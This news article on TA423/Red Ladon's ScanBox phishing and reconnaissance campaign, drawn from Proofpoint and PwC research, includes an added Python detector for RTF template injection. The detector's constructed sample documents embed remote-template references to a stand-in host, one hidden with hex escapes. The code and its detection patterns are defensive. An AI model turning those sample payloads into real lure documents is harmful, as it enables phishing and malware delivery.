In April, a China-based espionage actor leveraged the ScanBox reconnaissance framework to spy on local and federal government agencies and news media companies in Australia, as well as several global corporations involved in offshore energy projects in the South China Sea.

The latter category of victim included global heavy-industry manufacturers that maintain fleets of wind turbines in the South China Sea. For example, the threat group launched a phishing attack in March against a European supplier of heavy equipment used in the installation of an offshore wind farm in the Taiwan Strait, the YunLin Offshore Wind Farm. The targeting of these development projects coincided with a “period of tensions between China and other countries related to development projects of high strategic importance”, researchers said.

The threat actor, known as TA423 or Red Ladon, has activity overlaps with APT40, which was highlighted by the US Department of Justice in a 2021 indictment that assessed it provides long-term support to the Hainan Province department of the Ministry of State Security (MSS) and has focused on intellectual property related to naval technology developed by government-funded defense contractors around the world. Since that July 2021 indictment, however, Proofpoint analysts said in new research this week that they have not observed a distinct disruption in operational tempo for phishing campaigns associated with TA423/Red Ladon.

“While the indictment attributed this threat actor to a specific entity operating with the support of a Chinese state intelligence agency, the technical details included did not cover the tactics currently employed by the group in the wild”, Proofpoint’s Michael Raggi and PwC’s Sveva Scenarelli said in a joint analysis on Tuesday. “As a result, the group was free to continue using new phishing techniques like RTF Template Injection which began in early 2021 (before the indictment) and persisted until March 2022.”
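RTF Template Injection, mentioned above, works by placing a `\*\template` control word in the document that points at a remote URL, so that Word fetches a second-stage template when the file is opened. The following detector is an added example written for this article, not code from Proofpoint, PwC or the threat actor; it walks an RTF byte string, extracts every template destination (decoding the `\'hh` hex escapes attackers use to hide strings such as `http`), and flags any destination that is a remote URL or UNC path. The sample documents and the host name `template-host.invalid` are constructed for the example.

```python
import re

# Constructed sample RTF documents (not real samples from the campaign).
BENIGN_RTF = rb"{\rtf1\ansi\deff0{\fonttbl{\f0 Arial;}}\f0 Hello, world.\par}"
INJECTED_RTF = (
    rb"{\rtf1\ansi\deff0{\fonttbl{\f0 Arial;}}"
    rb"{\*\template http://template-host.invalid/resources/template.dotm}"
    rb"\f0 Quarterly user research survey.\par}"
)
# Same technique, but the scheme is hidden behind \'hh hex escapes.
OBFUSCATED_RTF = (
    rb"{\rt{\*\template \'68\'74\'74\'70://template-host.invalid/t.dotm}"
    rb"Request for cooperation.\par}"
)

# {\*\template <destination>}  -- the group Word uses to locate the attached template.
TEMPLATE_RE = re.compile(rb"\{\\\*\\template\s+([^}]*)\}", re.IGNORECASE)
# \'hh hex escape for a single byte.
HEX_ESCAPE_RE = re.compile(rb"\\'([0-9a-fA-F]{2})")
# Destinations that leave the local machine: web URLs or UNC shares.
REMOTE_RE = re.compile(r"^(?:https?://|ftp://|file://|\\\\)", re.IGNORECASE)


def _decode_rtf_text(raw: bytes) -> str:
    """Expand \\'hh escapes and strip line breaks so the destination reads as plain text."""
    decoded = HEX_ESCAPE_RE.sub(lambda m: bytes.fromhex(m.group(1).decode()), raw)
    return decoded.replace(b"\r", b"").replace(b"\n", b"").strip().decode("latin-1")


def rtf_template_refs(data: bytes) -> list[str]:
    """Return every template destination in the document, or [] if it is not RTF."""
    # Word accepts the truncated header "{\rt", so do not insist on "{\rtf1".
    if not data.lstrip().startswith(b"{\\rt"):
        return []
    return [_decode_rtf_text(m.group(1)) for m in TEMPLATE_RE.finditer(data)]


def is_remote_template(ref: str) -> bool:
    """True when the template destination points outside the local machine."""
    return REMOTE_RE.match(ref) is not None


def scan_rtf(data: bytes) -> dict:
    """Summarise template references and whether any of them is remote."""
    refs = rtf_template_refs(data)
    remote = [r for r in refs if is_remote_template(r)]
    return {
        "template_refs": refs,
        "remote_template_refs": remote,
        "suspicious": bool(remote),
    }


if __name__ == "__main__":
    for name, doc in [("benign", BENIGN_RTF), ("injected", INJECTED_RTF), ("obfuscated", OBFUSCATED_RTF)]:
        print(name, scan_rtf(doc))
```

A benign RTF normally has no `\*\template` group at all, so even a local template reference is worth a second look in mail-gateway triage; the remote-destination check above is the narrower, high-confidence signal.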

These attacks began with phishing emails from Gmail and Outlook email addresses, posing as an employee of a fictitious media publication called “Australian Morning News” and soliciting user feedback, or using a variety of lures, including “Sick Leave”, “User Research” and “Request for Cooperation”.

Victims who clicked on the links in the emails were redirected to a site claiming to be the Australian media publication and serving the ScanBox framework. This reconnaissance framework, which first appeared in 2014, has already been used by a number of China-based threat groups, including TA423 in 2018. The framework, which PwC assessed is “most likely privately shared between several China-based threat actors”, allows threat actors to profile their victims (collecting information such as the language, location and operating system of victims’ browsers, among other details) and deliver further malware to them. Although the framework was usually delivered from previously compromised websites through the injection of malicious JavaScript code, in this attack the threat actor already controlled the malicious site. While ScanBox can deliver its JavaScript code in a single block, researchers observed the framework using a more modular, plugin-based architecture in the April campaign.

“While delivering the entire code at once would allow hackers to have all the functionality of a victimized system, PwC threat intelligence analysts believe that a primary motivation for selectively loading plugins is likely a way to avoid crashes or errors that could warn owners of compromised websites,” the researchers said. “PwC believes that another likely motivation for adopting a modular architecture was to reduce visibility and researchers’ access to the threat actor’s plugins and toolset.” The group, which has been active since at least 2014, previously focused on maritime industries, naval defense contractors and associated research institutes in the United States, Western Europe and the South China Sea, often sending spear-phishing emails to targets with the end goal of deploying tools like Cobalt Strike or custom JavaScript malware.

“Overall, Proofpoint and PwC collectively expect TA423/Red Ladon to continue its intelligence and espionage mission primarily targeting countries in the South China Sea, as well as further intrusions into Australia, in Europe and the United States,” researchers said.